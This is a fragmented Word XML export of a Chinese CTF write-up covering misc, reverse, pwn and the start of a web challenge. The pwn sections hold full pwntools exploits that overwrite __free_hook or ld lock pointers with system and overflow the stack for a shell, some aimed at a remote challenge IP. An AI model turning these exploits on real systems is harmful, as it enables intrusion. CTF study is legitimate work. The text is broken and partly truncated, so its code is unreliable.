          <w:szCs w:val="2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emoji-aes</w:t>
      </w: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继续解密，发现后面对话内容如下</w:t>
      </w:r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5683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从邮件我们得知了两个信息，一个是存在一个后台网站，另一个是暗号已经换成了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GxD1r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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于是去dedecms的目录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奇怪的组织/phpstudy_pro/WWW/dede/a/Blog/2019/1130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中寻找，发现有一个博文写着一段aes加密的结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC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U2FsdGVkX1+z9Q5Yznug4MiYfkWZNHWTOt1nIUllLgNXSKQxIiF8zmWz2cdmmPxm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC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QkeQ/uF3INEXBZlhruUFJg==</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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使用新key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GxD1r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来解密，得到flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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flag{3e5923d2-c31c-49cd-bfa3-e366a1a59c4d}</w:t>
      </w:r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1" w:name="_Toc19036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密码机器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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使用hex2bin，将hex转化成bin，在文件结尾的地方可以看到明显的字符串，有python notepad，且存在一段python代码，可以得知是badusb的固件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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固件模拟鼠标键盘进行了一些操作，切换窗口，输入代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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根据逆向和字符串规律的观察，发现在python串口输入的代码为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base64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from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Crypto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Cipher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import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AES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def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add_to_16(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while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len(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!=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s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'\0'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return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encode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key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'aaaaa14mK3ybbbbb'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aes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AES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new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(str.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encode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AES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MODE_ECB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encrypted_text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'xWgrSJHUzsz0eb/V/sxbA3zG4UGMjRUPZbQF92C0DP4pmpgGh0IcjCvVUwbc/75Y'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decrypted_text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str(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aes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decrypt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base64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decodebytes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(bytes(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encrypted_text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encoding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='utf8'))).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rstrip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(b'\0').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decode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("utf8"))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# 解密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decrypted_text</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pP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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21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flag{ce19feba-e620-4477-8e93-a0abcdecb80d}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc25211_WPSOffice_Level1"/>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>everse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/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3" w:name="_Toc21813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Game</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/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逆向python bytecode，可知flag需经过check0，check1，check2，check3四个函数的检查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逆向check0函数，发现flag字符均在32, 128范围内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逆向check1函数，爆破条件l &lt; 100 and ((l*l) % 777) ^ 233 == 513获得flag长度为39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逆向check2函数，通过128进制得到flag的开头为“flag{5”以及结尾为“}”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逆向check3函数，其中对三段flag进行了计算，第一部分可以爆破运算式得到，第二部分需要通过第一部分的结果异或得到，第三部分类似16进制编码，可以直接恢复：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flag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[' ']*39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x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3533889469877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t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''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while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x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!=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t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x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%128)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x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/=128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[:6]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[::-1]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[-1]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'}'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arr0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[249,91,149,113,16,91,53,41]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i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range(8):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ch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range(32,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128):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ch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*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17684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372511)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257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arr0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[6+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*3]=chr(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arr1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[43,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62,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44,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113,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35,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44,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22,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127,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60]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key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[0]*4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[0]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arr1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[8]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^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ord(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[15])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[1]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arr1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[5]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^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ord(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[12])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[2]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arr1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[2]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^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ord(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[9])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[3]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arr1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[11]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^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ord(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[18])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[-2]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[0])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[-3]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[1])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[-4]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[2])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[-5]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[3])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i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range(len(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arr1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[7+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arr1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^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key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%4])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arr2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[90,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87,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108,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105,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90,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88,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102]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i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len(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arr2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ch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range(32,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128):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ch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107)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16)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77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arr2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and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ch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117)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16)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99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arr2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+1]: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[28+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/2]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chr(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ch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print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''.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join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flag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4" w:name="_Toc761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Enc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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使用IDA逆向程序，找到主要逻辑sub_401490函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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识别md5算法（sub_401050函数），还原加密算法（sub_4012A0函数）的密钥生成和加密逻辑。其中有类似RC6的加密算法和一段简单的异或和换位操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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逆向发现加密密钥是由当前时间决定的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srand(time % 177)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，一共只有177种可能，因此可以爆破。还原解密算法后，得到flag开头的结果即为最终flag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#include &lt;stdint.h&gt;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#include &lt;stdlib.h&gt;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#include &lt;ctime&gt;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#define ROUNDS      20     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#define KEY_LENGTH  256    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#define W           32    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#define P32 0x01234567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#define Q32 0x89abcdef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#define LG_W 5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const uint32_t k[64] =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0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee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0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501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0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be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0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821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0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa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0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8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0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed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0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a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0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c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0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70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0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05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0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665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0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039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0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1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0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1 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0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391 };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r specifies the per-round shift amounts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const uint32_t r[] = { 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22,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5,  9, 14, 20, 5,  9, 14, 20, 5,  9, 14, 20, 5,  9, 14, 20,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4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23,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6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21 };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leftrotate function definition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#define LEFTROTATE(x, c) (((x) &lt;&lt; (c)) | ((x) &gt;&gt; (32 - (c))))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to_bytes(uint32_t val, uint8_t* bytes)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bytes[0] = (uint8_t)val;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bytes[1] = (uint8_t)(val &gt;&gt; 8);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bytes[2] = (uint8_t)(val &gt;&gt; 16);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bytes[3] = (uint8_t)(val &gt;&gt; 24);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uint32_t to_int32(const uint8_t* bytes)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return (uint32_t)bytes[0]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| ((uint32_t)bytes[1] &lt;&lt; 8)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| ((uint32_t)bytes[2] &lt;&lt; 16)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| ((uint32_t)bytes[3] &lt;&lt; 24);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md5(const uint8_t* initial_msg, size_t initial_len, uint8_t* digest)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These vars will contain the hash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uint32_t h0, h1, h2, h3;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Message (to prepare)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uint8_t* msg = NULL;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size_t new_len, offset;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uint32_t w[16];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uint32_t a, b, c, d, i, f, g, temp;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Initialize variables - simple count in nibbles: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h0 = 0x67452301;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h1 = 0xefcdab89;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h2 = 0x98badcfe;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h3 = 0x10325476;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//Pre-processing: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//append "1" bit to message   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//append "0" bits until message length in bits ≡ 448 (mod 512)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//append length mod (2^64) to message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(new_len = initial_len + 1; new_len % (512 / 8) != 448 / 8; new_len++)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msg = (uint8_t*)malloc(new_len + 8);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memcpy(msg, initial_msg, initial_len);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msg[initial_len] = 0x80; // append the "1" bit; most significant bit is "first"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(offset = initial_len + 1; offset &lt; new_len; offset++)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msg[offset] = 0; // append "0" bits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append the len in bits at the end of the buffer.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to_bytes(initial_len * 8, msg + new_len);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initial_len&gt;&gt;29 == initial_len*8&gt;&gt;32, but avoids overflow.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to_bytes(initial_len &gt;&gt; 29, msg + new_len + 4);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Process the message in successive 512-bit chunks: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//for each 512-bit chunk of message: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(offset = 0; offset &lt; new_len; offset += (512 / 8))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break chunk into sixteen 32-bit words w[j], 0 ≤ j ≤ 15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(i = 0; i &lt; 16; i++)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w[i] = to_int32(msg + offset + i * 4);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Initialize hash value for this chunk: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a = h0;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 = h1;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 = h2;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 = h3;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Main loop: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(i = 0; i &lt; 64; i++)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(i &lt; 16)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 = (b &amp; c) | ((~b) &amp; d);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g = i;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else if (i &lt; 32)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 = (d &amp; b) | ((~d) &amp; c);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g = (5 * i + 1) % 16;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else if (i &lt; 48)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 = b ^ c ^ d;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g = (3 * i + 5) % 16;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else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 = c ^ (b | (~d));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g = (7 * i) % 16;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temp = d;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 = c;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 = b;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 = b + LEFTROTATE((a + f + k[i] + w[g]), r[i]);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a = temp;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Add this chunk's hash to result so far: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h0 += a;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h1 += b;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h2 += c;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h3 += d;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 cleanup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free(msg);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//var char digest[16] := h0 append h1 append h2 append h3 //(Output is in little-endian)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to_bytes(h0, digest);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to_bytes(h1, digest + 4);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to_bytes(h2, digest + 8);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to_bytes(h3, digest + 12);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typedef struct ctx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{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uint32_t *S;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uint8_t r;   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 ctx_t;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ctx_t* create_new()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ctx_t *new_ctx = (ctx_t*)malloc(sizeof(ctx_t));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new_ctx-&gt;S = (uint32_t*) calloc(2*ROUNDS+4, sizeof(uint32_t));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new_ctx-&gt;r = ROUNDS;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new_ctx;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ctx_free(ctx_t *ctx)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free(ctx-&gt;S);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free(ctx);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uint32_t rol32(uint32_t a, uint8_t n)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(a &lt;&lt; n) | (a &gt;&gt; (32 - n));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uint32_t ror32(uint32_t a, uint8_t n)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(a &gt;&gt; n) | (a &lt;&lt; (32 - n));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key_schedule(ctx_t *ctx, void *key)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ctx-&gt;S[0] = P32;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uint8_t i = 0, j = 0;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for(i = 1; i &lt;= 2*ctx-&gt;r+3; ++i)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ctx-&gt;S[i] = ctx-&gt;S[i-1] + Q32;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i = 0;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uint32_t a = 0, b = 0;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for(uint8_t k=1; k&lt;=3*(2*ctx-&gt;r+4); ++k)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a = ctx-&gt;S[i] = rol32((ctx-&gt;S[i] + a + b), 3);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b = ((uint32_t*)key)[j] = rol32(((uint32_t*)key)[j] + a + b, a + b);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i = (i+1) % (2*ctx-&gt;r+4);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j = (j+1) % (KEY_LENGTH/W);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decrypt(ctx_t *ctx, void *block)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register uint32_t A = ((uint32_t *)block)[0];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register uint32_t B = ((uint32_t *)block)[1];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register uint32_t C = ((uint32_t *)block)[2];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register uint32_t D = ((uint32_t *)block)[3];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 = C - ctx-&gt;S[2*ctx-&gt;r + 3];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A = A - ctx-&gt;S[2*ctx-&gt;r + 2];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uint32_t t=0, u=0, temp_reg;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for(uint8_t i = ctx-&gt;r; i &gt; 0; --i)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temp_reg = D;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D = C;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C = B;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B = A;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A = temp_reg;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t = rol32((B*(2*B+1)), LG_W);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u = rol32((D*(2*D+1)), LG_W);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C = ror32((C-ctx-&gt;S[2*i+1]), t) ^ u;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A = ror32((A-ctx-&gt;S[2*i]), u) ^ t;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D = D - ctx-&gt;S[1];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B = B - ctx-&gt;S[0];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((uint32_t *)block)[0]=A;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((uint32_t *)block)[1]=B;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((uint32_t *)block)[2]=C;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((uint32_t *)block)[3]=D;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dec0(unsigned char *txt)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for(int i = 0; i &lt; 16; i+=2)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txt[i] = txt[i] ^ txt[i+1];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txt[i+1] = txt[i] ^ txt[i+1];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txt[i] = txt[i] ^ txt[i+1];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for(int i = 0; i &lt; 16; i++)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txt[i] ^= i;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go(unsigned char *key, unsigned char *txt)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ctx_t *p = create_new();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key_schedule(p, key);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dec0(txt);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decrypt(p, txt);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void hexify(char* dest, unsigned char* src, int len)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for(int i = 0; i &lt; len; i++)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sprintf(dest+(2*i), "%02x", src[i] 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int main(void)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unsigned char txt1[16] = {102, 108, 97, 103, 123};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//unsigned char key1[32] = {0};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unsigned char result2[32] = {0};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for(int r=0; r&lt;177; r++)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unsigned char dest[] = {0xae,0xed,0x13,0x5c,0xbd,0xd2,0xa1,0x74,0x9c,0x4c,0x5e,0x2,0xd3,0x28,0x9b,0x60, 0};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uint8_t result[16];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int x = 0;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char hex_md5[32];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md5((uint8_t*)&amp;r, 4, result);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hexify((char*)result2, (unsigned char*)result, 16);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go((unsigned char*)result2, dest);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if(!memcmp(dest, txt1, 5) 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puts((char*)dest);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0;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5" w:name="_Toc14128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V</w:t>
      </w:r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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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逆向vm解析器，可以发现这是一个基于栈的vm，其中也有一个内存段和5个寄存器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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还原每个opcode，编写disassembler翻译vm指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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逆向vm指令可以发现程序首先做了一个异或+移位，然后根据当前位置的奇偶再做一个数字运算，将这两步还原即可：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=[102,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78,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253,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60,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85,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144,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87,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246,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93,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177,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32,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129,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253,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54,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31,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161,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128,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143,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206,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119,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232,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35,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158,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39,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96,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47,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165,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207,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27,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189,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50,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219,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255,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40,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164,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93]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=[0]*42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[0]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dest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[0]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dest3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=[0]*42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i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range(1,42):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i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]-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-1]+256)%256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else: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j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range(256):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if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(107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*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j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)%256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dest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j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break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i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range(6):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j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in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range(7):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dest3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j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*6+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dest2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[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*7+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j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]^((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+2)*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j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print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dest2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dest3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="6"/>
              <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
              <w:spacing w:after="240"/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print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''.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join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(map(chr,</w:t>
            </w:r>
            <w:r>
              <w:rPr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dest3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC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))</w:t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"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc27576_WPSOffice_Level1"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/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7" w:name="_Toc10422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MarksMan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/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本题libc版本为2.27,保护全开。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题目逻辑比较直白，送个libc地址，写3个连续byte拿shell。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难点在于所有one gadget都被禁用了。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一个可行的思路是打ld，在ld上找到两个比较有意思的函数指针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rtld_lock_default_unlock_recursive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和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rtld_lock_default_lock_recursive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。在dlopen里调用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rtld_lock_default_unlock_recursive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时，rdi指向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__rtld_global+2312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,假设能把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rtld_lock_default_unlock_recursive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改为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gets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就有非常大的发挥空间了。后面选择进一步把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rtld_lock_default_lock_recursive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改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC" w:cs="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>system</w:t>
      </w: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，用稳定的方式拿shell，当然这时候也可以尝试one gadget因为这里的gets没有原题的check了。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当然我觉得这个题还有别的解法，各凭本事吧。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pwn import *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args['DEBUG']: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context.log_level = "debug"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code = ELF("./chall")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context.arch=code.arch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args['REMOTE']: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 = remote("106.15.186.69", 40033)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else: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 = process("./chall")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raw_input("#")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libc=ELF("./libc.so.6")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conn.recvuntil("target near: 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leak_libc = int(conn.recv(14), 16) - libc.sym['puts']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'[libc]: ' + hex(leak_libc)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conn.sendlineafter("shoot!\n", str(leak_libc+0x81df68))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gets_addr = leak_libc+libc.sym['gets']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'[gets]: ' + hex(gets_addr)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range(3):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conn.sendlineafter("biang!\n", p64(gets_addr)[i])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 = {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0: '/bin/sh\0',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0x10: 1,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0x38: 1,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0x50: 5,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0x70: 0x7e,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0x78: 3,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0x5f8: leak_libc + libc.sym['system'],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conn.sendline(fit(f, filler='\0', length=0x600))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conn.interactive()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8" w:name="_Toc5525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SecureBox</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/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本题libc版本为2.30, 保护全开。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漏洞点在于Allocate函数，首先uint64_t强制转换为uint32_t可以bypass到size的check。其次malloc的size过大时，返回值为0。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利用malloc未清空的特点泄露libc基地址。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然后malloc(0x7fffffff00000500),这样就等于libc范围内任意写了。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/>
        <w:jc w:val="left"/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提供的exp选择将free_hook改成system来稳定拿shell。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pwn import *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args['DEBUG']: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context.log_level = "debug"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code = ELF("./chall")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context.arch=code.arch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args['REMOTE']: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 = remote("106.15.186.69", 40032)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else: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 = process("./chall")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libc=ELF("./libc.so.6")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raw_input("#")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Allocate(size):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conn.sendlineafter("5.Exit\n", '1')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conn.sendlineafter("Size: \n", str(size))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conn.recvuntil("Key: \n")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key_msg = conn.recvline().strip("\n").split(" ")[:-1]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key = [int(i,16) for i in key_msg]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print key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key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Delete(idx):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conn.sendlineafter("5.Exit\n", '2')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conn.sendlineafter("Box ID: \n", str(idx))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Show(idx, offset, size):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conn.sendlineafter("5.Exit\n", '4')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conn.sendlineafter("Box ID: \n", str(idx))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conn.sendlineafter("Offset of msg: \n", str(offset))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conn.sendlineafter("Len of msg: \n", str(size))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Enc(idx, offset, size, msg):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conn.sendlineafter("5.Exit\n", '3')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conn.sendlineafter("Box ID: \n", str(idx))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conn.sendlineafter("Offset of msg: ", str(offset))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conn.sendlineafter("Len of msg: ", str(size))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conn.sendafter("Msg: \n", msg)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key0 = Allocate(0x500)#0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key1 = Allocate(0x500)#1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binsh = "/bin/sh\x00"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binsh_enc = ''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range(8):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binsh_enc += chr(ord(binsh[i])^key1[i])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Enc(1, 0, 8, binsh_enc)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Delete(0)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key0 = Allocate(0x500)#0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Show(0, 0, 8)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conn.recvuntil("Msg: \n")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leak_libc = u64(conn.recv(6).ljust(8, "\x00"))-0x1eabe0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print '[libc]: ' + hex(leak_libc)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key2 = Allocate(0x7fffffff00000300)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system = p64(leak_libc+libc.sym['system'])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system_enc = ''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for i in range(8):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system_enc += chr(ord(system[i])^key2[i])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Enc(2, leak_libc+libc.sym['__free_hook'], 8, system_enc)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Delete(1)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conn.interactive()</w:t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39" w:name="_Toc1749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Count</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pP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 w:cs="Helvetic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程序随机生成200道算术题，全部答对之后进入漏洞处，看到栈溢出溢出覆盖拿到flag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pwn import *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sys import argv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context.log_level = 'debug'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len(argv)==3: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ip,port=argv[1],int(argv[2])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p=remote(ip,port)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else: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p=process('./pwn')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sl = lambda s : p.sendline(s)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sd = lambda s : p.send(s)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rc = lambda n : p.recv(n)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ru = lambda s : p.recvuntil(s)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 = 0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while i&lt;200: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ru("Math:")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a = ru("*")[:-1].strip()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b = ru("+")[:-1].strip()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 = ru("+")[:-1].strip()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d = ru("=")[:-1].strip()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t = int(a)*int(b)+int(c)+int(d)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ru("answer:")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sl(str(t))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i += 1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p.send('a'*100+p64(0x12235612))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p.interactive()</w:t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40" w:name="_Toc22256_WPSOffice_Level2"/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</w:t>
      </w:r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ncnote</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/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检查题目保护，题目保护全开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使用 IDA逆向，发现只有增删两个功能，改查两个功能都是空的，新增功能允许分配0x30-0x200大小的堆块，但是只能写前8个字节。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此外还有加密和解密两个功能，密钥是初始时随机的，经过逆向可发现加密用的是blowfish算法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题目的漏洞在于解密函数中有一个后门，解密出的明文的左半侧如果是某个值，可以通过右半侧的明文在栈上修改一个字节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可以把指向存储明文的指针的低字节改掉，使明文可以覆盖bss段上的其他字段。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这个题目的难点在于没有泄露，加密和解密的对象是用户的输入，而不是libc地址之类的值。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key是存储在堆上的，可以选择用5中的覆盖，覆盖key指针的低字节，使其指向堆上unsorted bin的开头，此时key的第一位是unsorted bin的fd的高字节，其他都是0，然后用这个key加密一段内容，再在本地，爆破这个key，只需256次就能得到fd的最高位。然后再用5，使key指向unsorted bin的次高字节，继续爆破，这样本地只需要6*256次爆破就可以得到完整的unsorted bin的fd，也就获得了libc地址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有了libc地址，可以继续用5中的覆盖，改写指向加密的密文的指针，使其指向libc中的free_hook,然后加密system地址的解密的结果，就可以使free_hook被改写成system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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12"/>
        </w:num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  <w:t>此时free 一个/bin/sh的堆块，得到shell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#!/usr/bin/env python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pwn import *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from Crypto.Cipher import Blowfish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import sys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context.log_level="debug"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#context.log_level="info"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code=ELF("./encnote",checksec=False)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context.terminal = ['gnome-terminal','-x','sh','-c']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context.arch = code.arch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if len(sys.argv)&gt;2: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con=remote(sys.argv[1],int(sys.argv[2]))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libc=ELF("./libc-2.23.so")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elif len(sys.argv)&gt;1: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libc = ELF(sys.argv[1])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 = code.process(env = {"LD_PRELOAD":sys.argv[1]})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else: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con=code.process()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if(context.arch == "amd64"):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libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")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else: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libc=ELF("/lib/i386-linux-gnu/libc.so.6")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add(index,length):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con.sendlineafter("Choice:\n","1")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con.sendlineafter("id:",str(index))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con.sendlineafter("length:",str(length))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con.sendlineafter("price:","/bin/sh\x00")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free(index):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con.sendlineafter("Choice:\n","2")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con.sendlineafter("id:",str(index))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enc(mes):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con.sendlineafter("Choice:\n","5")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con.sendafter("message:\n",mes)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res = con.recvline()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res.strip()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dec(mes):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con.sendlineafter("Choice:\n","6")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con.sendafter("message:\n",mes)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z(commond=""):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gdb.attach(con,commond)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backdoor(addr,v):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ci = enc(p32(0x867d33fb)+chr(addr)+chr(14)+"7"+chr(v))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dec(ci.zfill(16).decode("hex")[::-1])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backdoor2(key,addr,v):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 =  Blowfish.new(key, Blowfish.MODE_ECB)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ci = c.encrypt((p32(0x867d33fb)+chr(addr)+chr(14)+"7"+chr(v))[::-1])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dec(ci[::-1])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bruteforcekey(target,key):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for i in range(0x100):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tmp =  chr(i)+key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tmp = tmp.ljust(8,"\x00")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c =  Blowfish.new(tmp, Blowfish.MODE_ECB)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test = c.encrypt("87654321")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if target == test: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    return chr(i)+key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leak():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key = ""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for i in range(6):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backdoor(0x39,0x3d-i)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target = enc("12345678").zfill(16)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key = bruteforcekey(target.decode("hex"),key)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return key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def exploit():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pause()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add(0,0x100)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add(1,0x30)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free(0)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key = leak().ljust(8,"\x00")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libc.address = u64(key)-0x3c4c78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print hex(libc.address)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target = p64(libc.symbols['__free_hook'])[::-1]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print repr(target)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for i in range(8):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    backdoor2(key,0xb0-i,ord(target[i]))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 =  Blowfish.new(key, Blowfish.MODE_ECB)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ci = c.decrypt(p64(libc.sym['system'])[::-1])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enc(ci[::-1])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   free(1)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exploit()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pP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con.interactive()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC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ab/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"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc24935_WPSOffice_Level1"/>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/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42" w:name="_Toc22715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easy</w:t>
      </w:r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_login</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t>题目说明：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最近正在开始学习nodejs开发，不如先写个登陆界面练练手。什么，大佬说我的程序有bug？我写的代码逻辑完美顺利运行怎么可能出错？！错的一定是我的依赖库！！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t>可推测是题目依赖库存在问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t xml:space="preserve">测试题目功能，注册账号，不能注册admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t xml:space="preserve">登陆 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t>在home页可以看到输入框和get flag的按钮，点击按钮提示权限不足。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t xml:space="preserve">翻看题目前端代码/burp记录的流量，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t xml:space="preserve">/static/js/app.js </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC"/>
        </w:rPr>
        <w:t>发现：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> *  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
